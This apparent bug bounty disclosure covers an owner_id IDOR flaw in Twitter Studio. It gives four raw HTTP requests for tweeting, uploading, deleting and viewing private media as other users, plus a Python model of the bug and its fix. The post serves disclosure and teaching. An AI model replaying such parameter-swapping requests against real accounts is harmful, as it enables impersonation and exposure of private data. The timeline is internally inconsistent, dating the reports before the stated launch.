How I took control of your Twitter account (tweeting, viewing/deleting photos and other media)

Summary:

This blog post is about an insecure direct object reference (IDOR) vulnerability on Twitter that could have been used by attackers to tweet from other accounts, upload videos on behalf of a user, delete pictures/videos from a victim's tweets, view private media uploaded by other Twitter accounts, and so on. All endpoints on studio.twitter.com were vulnerable.

Description:

Twitter is an online news and social networking service where users post and interact with messages, "tweets", restricted to 140 characters. Registered users can post tweets, but those who are unregistered can only read them. Users access Twitter through its website interface, SMS or a mobile device app.

Twitter had launched a new product named Twitter Studio (studio.twitter.com) in September 2016, so I started looking for security loopholes after the launch. All API requests on studio.twitter.com sent a parameter named "owner_id", which was the Twitter user ID of the logged-in user (publicly available and sequential). The owner_id parameter was never checked against the session that sent the request, so changing it allowed me to take actions on behalf of other Twitter users.

Vulnerable request #1 (Tweeting from other Twitter accounts)

POST /1/tweet.json HTTP/1.1
Host: studio.twitter.com

{"account_id":"attacker's account id","owner_id":"victim's user id","metadata":
{"monetize":false,"embeddable_playback":false,"title":"Test tweet by attacker",
"description":"attacker attacker","cta_type":null,"cta_link":null},"media_key":"",
"text":"attacker attacker"}

Replaying the above request with the victim's user ID as owner_id resulted in a tweet from the victim's account.

Vulnerable request #2 (Upload media from other accounts)

POST /1/library/add.json HTTP/1.1
Host: studio.twitter.com

{"account_id":"attacker's accountid","owner_id":"victim's id","metadata":
{"monetize":false,"name":"abcd.png","embeddable_playback":true,"title":"Attacker",
"description":"","cta_type":null,"cta_link":null},"media_id":"","managed":false,
"media_type":"TweetImage"}

Replaying the above request with the victim's owner_id uploaded media into the victim's account.

Vulnerable request #3 (Delete videos of other accounts)

POST /1/library/remove.json HTTP/1.1
Host: studio.twitter.com

{"account_id":"attacker's account id","owner_id":"victim's id","media_key":"victim's video id"}

Replaying the above request with the victim's user ID and the victim's media_key deleted media from the victim's account.

Vulnerable request #4 (Private media disclosure)

GET /1/library/list.json?account_id=attacker's account id&owner_id=victim's id&limit=20&offset=0 HTTP/1.1
Host: studio.twitter.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://studio.twitter.com/library
Cookie: 
Connection: keep-alive

Replaying the above request with the victim's user ID and my own account ID returned all of the victim's private media in the response.
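The four requests above share one root cause: the server took the acting user from the client-supplied owner_id instead of from the session. The block below is an added illustration, not Twitter's code, that models the bug and its fix side by side and replays the four requests through each. The in-memory state, the account model (account_id mapped to the set of user IDs allowed to act on it), the handler names and the sample IDs are all assumptions made for the example.

```python
# Added illustration of the owner_id IDOR on studio.twitter.com and its fix.
# This is NOT Twitter's code: the in-memory state, the account/user
# relationship (account_id -> set of user IDs allowed to act on it) and the
# handler names are assumptions made for this example.


class Forbidden(Exception):
    """Raised by the hardened handler when the session may not act as owner_id."""


def fresh_state():
    """Constructed sample data: two Studio accounts, one private video in the victim's library."""
    return {
        "members": {"acct_attacker": {1001}, "acct_victim": {2002}},
        "library": {
            1001: {},
            2002: {"vid_001": {"title": "unreleased teaser", "private": True}},
        },
        "tweets": [],
    }


def _perform(state, owner, path, body):
    """The four Studio actions, keyed on whichever user ID the dispatcher resolved as owner."""
    lib = state["library"].setdefault(owner, {})
    if path == "/1/tweet.json":
        state["tweets"].append({"owner_id": owner, "text": body["text"]})
        return {"status": "tweeted", "owner_id": owner}
    if path == "/1/library/add.json":
        key = "m_%d_%d" % (owner, len(lib) + 1)
        lib[key] = {"title": body["metadata"]["title"], "private": True}
        return {"media_key": key}
    if path == "/1/library/list.json":
        return {"owner_id": owner, "media": dict(lib)}
    if path == "/1/library/remove.json":
        if body["media_key"] not in lib:
            raise KeyError("no such media for owner %d" % owner)
        del lib[body["media_key"]]
        return {"status": "removed"}
    raise KeyError("unknown endpoint %s" % path)


def vulnerable_dispatch(state, session_user, path, body):
    """The bug from the post: the acting user comes from the request body, and the
    session user is never compared with owner_id, so anyone can act as anyone."""
    return _perform(state, int(body["owner_id"]), path, body)


def hardened_dispatch(state, session_user, path, body):
    """Fix: authorise against the session, never the client-supplied identifier.
    1. the session user must be a member of account_id;
    2. an owner_id that differs from the session user is rejected outright, so the
       parameter can only ever be redundant and can never redirect the action."""
    if session_user not in state["members"].get(body["account_id"], set()):
        raise Forbidden("user %d is not a member of %s" % (session_user, body["account_id"]))
    if "owner_id" in body and int(body["owner_id"]) != session_user:
        raise Forbidden("owner_id %s does not match session user %d" % (body["owner_id"], session_user))
    return _perform(state, session_user, path, body)


def idor_probe(dispatch, session_user, account_id, victim_id, victim_media_key):
    """Replay the four requests from the post as the attacker's session with owner_id
    swapped to the victim's ID. Returns (endpoints that accepted the swap, final state)."""
    state = fresh_state()
    base = {"account_id": account_id, "owner_id": victim_id}
    requests = [
        ("/1/tweet.json", {**base, "text": "attacker attacker"}),
        ("/1/library/add.json", {**base, "metadata": {"title": "Attacker", "name": "abcd.png"}}),
        ("/1/library/list.json", {**base}),
        ("/1/library/remove.json", {**base, "media_key": victim_media_key}),
    ]
    accepted = []
    for path, body in requests:
        try:
            dispatch(state, session_user, path, body)
            accepted.append(path)
        except Forbidden:
            pass
    return accepted, state


if __name__ == "__main__":
    for name, dispatch in (("vulnerable", vulnerable_dispatch), ("hardened", hardened_dispatch)):
        accepted, state = idor_probe(dispatch, 1001, "acct_attacker", 2002, "vid_001")
        print(name, "accepted:", accepted)
        print("   victim library now:", sorted(state["library"][2002]))
```

The probe is the same check a tester performs by hand in a proxy: replay each authenticated request with owner_id swapped to another (public, sequential, hence trivially enumerable) user ID and note which endpoints still succeed. Against the vulnerable dispatcher every endpoint accepts the swap and the victim's private video ends up deleted; against the hardened one every request is refused while the victim's own, untampered requests still go through.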


Video Proof of concept:

All tests were done on a friend's account after taking permission. In the videos I am using my own session cookies to tweet from another person's account (Sunil Bhati).

#1 Tweet from victim's account, private media leakage (video)

#2 Delete media from victim's tweets (video)

Timeline:
29th August - Reported all findings to Twitter in 3 different reports, as the endpoints were different.
2nd September - Received a response from the Twitter team saying they were looking into the issue and would be closing the other reports as duplicates, since they share the same root cause, i.e. the missing owner_id check.
3rd September - Bounty of $5,040 rewarded by Twitter.
3rd September - Pinged them to check whether the report falls under the "Core Twitter" category for bounty, as it impacted Twitter.com. No response from them.



